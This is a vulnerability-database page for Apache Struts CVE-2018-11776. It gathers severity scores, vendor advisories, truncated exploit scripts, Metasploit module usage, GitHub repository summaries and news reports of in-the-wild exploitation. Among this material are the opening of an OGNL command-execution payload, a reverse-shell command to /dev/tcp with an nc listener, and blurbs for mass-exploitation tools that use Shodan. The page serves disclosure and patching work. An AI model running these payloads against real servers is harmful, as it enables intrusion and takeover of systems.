9.3
CVSSv2

CVE-2018-11776

Published: 22/08/2018 Updated: 14/03/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2
VMScore: 1000
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.

Vulnerability Trend

Affected Products

Vendor Product Versions
ApacheStruts2.3.1, 2.3.1.1, 2.3.1.2, 2.3.3, 2.3.4, 2.3.4.1, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.3.32, 2.3.33, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10, 2.5.11, 2.5.13, 2.5.14, 2.5.14.1, 2.5.15, 2.5.16

Vendor Advisories

Apache Struts versions 23 to 2334 and 25 to 2516 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when usin ...
A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action In cases where up ...
There is a vulnerability in Apache Struts which the IBM FlashSystem™ V840 is susceptible An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
A vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and V9100 products Apache Struts is used in the Service Assistant GUI The Service Assistant CLI is unaffected ...
There is a vulnerability in Apache Struts which the IBM FlashSystem™ 840 and 900 are susceptible An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system ...
Summary Apache Struts versions 23 to 2334 and 25 to 2516 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace Same possibility when using url tag which doesn't have value and action set and in same time, its upper action(s) have no or wildcard name ...
Oracle Security Alert Advisory - CVE-2018-11776 Description This Security Alert addresses CVE-2018-11776, a vulnerability in Apache Struts 2 CVE-2018-11776 has received a CVSS v3 base score of 98 When the alwaysSelectFullNamespace option is enabled in a Struts 2 ...
Oracle Critical Patch Update Advisory - January 2019 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previou ...
Oracle Critical Patch Update Advisory - October 2018 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previou ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- # hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter import sys import urllib import urllib2 import httplib def exploit(host,cmd): print "[Execute]: {}"format(cmd) ognl_payload = "${" ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)" ognl_payload += "(#cmd='{}')"f ...
#!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # struts-pwn: Apache Struts CVE-2018-11776 Exploit # Author: # Mazin Ahmed <Mazin AT MazinAhmed DOT net> # This code uses a payload from: # githubcom/jas502n/St2-057 # ***************************************************** import argparse im ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE # Eschewing CmdStager for now, since the use of '\' and ';' a ...

Mailing Lists

Apache versions 23 up to 2334 and 25 up to 2516 remote code execution exploit ...
This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 23 through 234, and 25 through 2516 Remote code execution can be performed via an endpoint that makes use of a redirect action Native payloads will be converted to executables and dropped in the server's temp dir If this fails, try a cmd/* paylo ...
[CVEID]:CVE-2018-11776 [PRODUCT]:Apache Struts [VERSION]:Apache Struts 23 to 2334 and 25 to 2516 [PROBLEMTYPE]:Remote Code Execution [REFERENCES]:cwikiapacheorg/confluence/display/WW/S2-057 [DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was noticed that Apache Struts versions 23 to 2334 and 25 to 2516 suffer f ...

Metasploit Modules

Apache Struts 2 Namespace Redirect OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_namespace_ognl
      msf exploit(struts2_namespace_ognl) > show targets
            ...targets...
      msf exploit(struts2_namespace_ognl) > set TARGET <target-id>
      msf exploit(struts2_namespace_ognl) > show options
            ...show and set options...
      msf exploit(struts2_namespace_ognl) > exploit

Github Repositories

CVE-2018-11776 2018年8月23日,Apache Strust2发布最新安全公告,Apache Struts2 存在远程代码执行的高危漏洞,该漏洞由Semmle Security Research team的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。Struts2在XML配置中如果namespace值未设置且(Action Configuration)中未设置或用通配符namespace时可能会导致远

CVE-2018-11776 This is part of Cved: a tool to manage vulnerable docker containers Cved: gitlabcom/git-rep/cved Image source: githubcom/cved-sources/cve-2018-11776 Image author: githubcom/knqyf263/CVE-2018-11776

Vulnerable docker container for CVE-2018-11776 # docker pull bhdresh/cve-2018-11776:10 # docker run -dit -p &lt;IP ADDRESS&gt;:8080:8080 bhdresh/cve-2018-11776:10 PoC PoC - 1 Request : &lt;IP ADDRESS&gt;:8080/struts2-showcase-2314/${333+333}/helpaction Result : &lt;IP ADDRESS&gt;:8080/struts2-showcase-2314/666/helpaction PoC - 2

CVE-2018-11776 Docker container and POC exploit written in Go You can build your own image and run it: docker build -t your_image_name docker container run -it --rm -p 8080:8080 your_image_name Or you just can pull the one I created with love for you: docker container run -it --rm -p 8080:8080 tuxotron/cve-2018-11776 Vulnerable application running on port 8080 To try the ex

S2-057-CVE-2018-11776 A simple exploit for Apache Struts RCE S2-057 (CVE-2018-11776) IMPORTANT: Is provided only for educational or information purposes Deploy test environment git clone githubcom/vulhub/vulhub cd vulhub/struts2/s2-057 docker-compose up -d Usage exploitpy &lt;url&gt; &lt;command&gt; &lt;action&gt; &lt;payload&gt; Exam

struts-pwn - CVE-2018-11776 Exploit An exploit for Apache Struts CVE-2018-11776 Usage Check if the vulnerability exists against a single URL python struts-pwnpy --url 'examplecom/demo/struts2-showcase/indexaction' Check if the vulnerability exists against a list of URLs python struts-pwnpy --list 'urlstxt' Exploit a single URL python struts-pw

CVE-2018-11776 Environment for CVE-2018-11776 / S2-057 Demo Run server $ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776 Exploit $ nc -l 10000 (or nc -lp 10000) $ python3 exploitpy localhost:30080 'bash -i &gt;&amp; /dev/tcp/192168331/10000 0&gt;&amp;1'

CVE-2018-11776 2018年8月23日,Apache Strust2发布最新安全公告,Apache Struts2 存在远程代码执行的高危漏洞,该漏洞由Semmle Security Research team的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。Struts2在XML配置中如果namespace值未设置且(Action Configuration)中未设置或用通配符namespace时可能会导致远

CVE-2018-11776-Python-PoC hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter Working Python test and PoC for CVE-2018-11776, originally appearing on; githubcom/hook-s3c/CVE-2018-11776-Python-PoC What's going on? Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request Versions affected are 2

Apache Struts Vulnerability Demo (CVE-2018-11776) Description Spins up an isolated test environment for experimentation with Apache Struts vulnerability CVE-2018-11776 Getting Started To bring up the test environment, run the following command: aws cloudformation create-stack \ --template-body file://cfnyml \ --stack-name &lt;STACK_NAME&gt; \ --parameters \ ParameterK

Strutter Proof of Concept for CVE-2018-11776, comes complete with the ability to search Shodan API for targets CVE-2018-11776 Apache Struts versions 23 to 2334 and 25 to 2516 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace Same possibility when using url tag which doesn&#

APACHE STRUTS SHODAN EXPLOIT POC Author: @037 Original code can be found here This tool takes advantage of CVE-2018-11776 and Shodan to perform mass exploitation of verified and vulnerable Apache Struts servers Shodan search parameter has been left out to weed out any skids trying to use this tool for malicious reasons This tool is created to be treated as a proof of conce

CVE靶场快速搭建 使用方式 $ git clone githubcom/white3/Cvekergit 进入需要进行实验的CVE目录下 $ docker-compose up -d 详细使用请看改CVE下的README文件。 已有CVE CVE编号 标题 CVE-2018-11776 S2-057远程代码执行

CVE-2018-11776 Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available Originally found by Man Yue Mo, Semmle: semmlecom/news/apache-struts-CVE-2018-11776 Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to

Mitaka Mitaka is an OSINT friendly browser extension which can: Extract &amp; refang IoC from a block of text Eg example[]com to examplecom Search / scan it on various engines Eg VirusTotal, urlscanio, Censys, Shodan, etc Features Supported IOC types name desc eg text Freetext any string(s) ip IPv4 address 8888 domain Domain name git

Deep Security Smart check reporting module Maintained by Tejas Sheth This module shows how to use the Deep Security Smart Check API to retrieve the vulnerability findings from the last scan on an image See the API reference documentation for more things you can do with the Deep Security Smart Check API Get started Install dependencies You will need Python 3 and pipenv to ins

Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP) Ivan@360云影实验室 2018年08月24日 0x01 前言 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架

CVE-2018-11776 (S2-057) [*] Usage: S2-057jar &lt;url&gt; &lt;action&gt; &lt;command&gt; &lt;payload (1-5)&gt; [*] Example: S2-057jar "examplecom/struts2-showcase/" "/actionChain1action" "whoami" 4

Domainker Setup Python pypi package got removed if you want to use this tool follow the steps below Manual setup git clone githubcom/BitTheByte/Domainker cd Domainker pip install -r requirementstxt python domainkerpy How to use I developed this tool to be easily managed and upgraded so i created it as small plugin systems connected together Plugins and usage lib

St2-057 在线靶机环境,Enjoy! 0x01 搭建环境docker githubcom/vulhub/vulhub/tree/master/struts2/s2-048 docker-compose up -d 0x02 搭建st2-057漏洞环境 docker exec -i -t 88fd8d560155 /bin/bash 后台启动进入docker 根据公告 strutsapacheorg/releaseshtml Release Release Date Vulnerability Version Notes Struts 2516 16 March 2018 S2-057

desc Docker container for a configured-to-be-vulnerable version of struts2-showcase application

awesome-java-security-checklist 准备开java安全坑,把自己学习找到的相关资料分享出来总结一下,持续更新欢迎各位表哥star和提交新的内容支持一下,协助修正完善 资料均来自网上收集,如未标明作者有侵权行为,请及时联系h4x0er[at]secbugorg进行删除或修改。 喜欢请点 Star,如果不打算贡献,千

WsylibBookRS 主要内容: 解决目前学校图书管理系统不能由学生推荐图书到图书馆的问题,经过使用测试,符合生产使用环境 使用技术 spring 4318 spring jdbc 4318 struts 2518 mysql 57 开发环境 eclipse    maven 35 建议及其pull 如果你对本项目感兴趣,请动一动的你尊贵的小手,fork一下

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php terminado jsp proceso CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:' and 'redirectAction

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

CVE-exploits This repository is a collections of CVE exploits

ABOUT: Kn0ck is an automated scanner that can be used during a penetration testing to enumerate and scan for vulnerabilities KN0CK FEATURES: Automatically collects basic recon Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks f

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Etrata CI Vuln Scanner What is it? This is a lightweight python script that will load/read a directory of CVEs and allow you to search on them Usage etrata -n struts -v 2332 &gt;'CVE-2017-9787', &gt;'CVE-2017-9791', &gt;'CVE-2017-9793', &gt;'CVE-2017-9804', &gt;'CVE-2017-9805', &gt;'CVE-2018

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding) Edge Side Includes XML input handling Suspicious input transformation (eg

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description an

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description an

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a IRL Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability description and how to exploit it Intrud

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability descriptio

Payloads_All_The_Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains the following files, you can use the _template_vuln folder to create a new chapter: READMEmd - vulnerability d

raw:: html image:: /pictures/logopng raw:: html image:: imgshieldsio/badge/python-36-bluesvg :target: wwwpythonorg/downloads/release/python-366/ :alt: Python 36 image:: readthedocsorg/projects/jok3r/badge/?version=latest :target: jok3rreadthedocsio/en/latest/ :alt: Documentation ReadTheDocs image:: im

Jok3r - Network and Web Pentest Framework Jok3r es una aplicación CLI de Python3 que está dirigida a ayudar a los auditores de penetración en infraestructuras de red y pruebas de seguridad web de black-box Su principal objetivo es ahorrar tiempo en todo lo que se puede automatizar en la red/web a auditar para disfrutar más tiempo en cosas más

Jok3r v3 beta Network &amp; Web Pentest Automation Framework wwwjok3r-frameworkcomWARNING: Project is still in version 3 BETA It is still under active development and bugs might be present Many tests are going on: see githubcom/koutto/jok3r/blob/master/tests/TESTSrst Ideas, bug reports, contributions are welcome ! Overview Features Demos Architecture

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 address | introduce | -|-|- 名字 | 介绍 | 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome awesome系列 wwwowasporgcn/owasp-pr

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Thought Patch Tuesday was a load? You gotta check out this Oracle mega-advisory, then
The Register • Shaun Nichols in San Francisco • 16 Oct 2018

And you'll definitely want to check out the libssh flaw

Oracle has released a wide-ranging security update to address more than 300 CVE-listed vulnerabilities in its various enterprise products.
The October release covers the gamut of Oracle's offerings, including its flagship Database, E-Business Suite, and Fusion Middleware packages.
For Database, the update addresses a total of three flaws. Two of the vulnerabilities (CVE-2018-3259 and CVE-2018-3299) can be remotely exploited without authentication, while the third, CVE-2018-7489, woul...

CroniX CryptoMiner Kills Rivals to Reign Supreme
BleepingComputer • Ionut Ilascu • 06 Sep 2018

The operator of a new cryptomining campaign takes aggressive actions against its competition and halts other cryptojacking activity on the machines it claims.
Cybercriminals are quick to take advantage of any proof-of-concept (PoC) exploit code that falls into their hands. For the recently disclosed Apache Struts vulnerability (CVE-2018-11776) there are multiple PoCs available, so news of the bug exploited in the wild came as no surprise.
Cryptomining is all the rage these days, and...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

PoC targeting critical Apache Struts bug found online
welivesecurity • Tomáš Foltýn • 28 Aug 2018

Researchers have discovered freely available proof-of-concept (PoC) code that can be used to exploit a critical security hole in the Apache Struts 2 web application framework shortly after the vulnerability was disclosed and the patch was released.
The PoC, “including a Python script that allows for easy exploitation”, was found by threat intelligence company Recorded Future on the software development platform GitHub. The firm also said that it has spotted chatter on underground forum...

Active Attacks Detected Using Apache Struts Vulnerability CVE-2018-11776
BleepingComputer • Catalin Cimpanu • 28 Aug 2018

After last week a security researcher revealed a vulnerability in Apache Struts, a piece of very popular enterprise software, active exploitation attempts have started this week.
The vulnerability in question is tracked as CVE-2018-11776, a remote code execution flaw that allows an attacker to gain control over Struts-based web applications.
The vulnerability is not exploitable in default Struts configurations, according to an analysis by Palo Alto Networks, but the flaw is of intere...

Apache's latest SNAFU – Struts normal, all fscked up: Web app framework needs urgent patching
The Register • Kieren McCarthy in San Francisco • 22 Aug 2018

Paging Equifax: Time to update again, fellas

Another critical security hole has been found in Apache Struts 2, requiring an immediate update.
The vulnerability – CVE-2018-11776 – affects core code and allows miscreants to pull off remote code execution against vulnerable servers and websites. It affects all versions of Struts 2, the popular open-source framework for Java web apps.
The Apache Software Foundation has "urgently advised" anyone using Struts to update to the latest version immediately, noting that the last time ...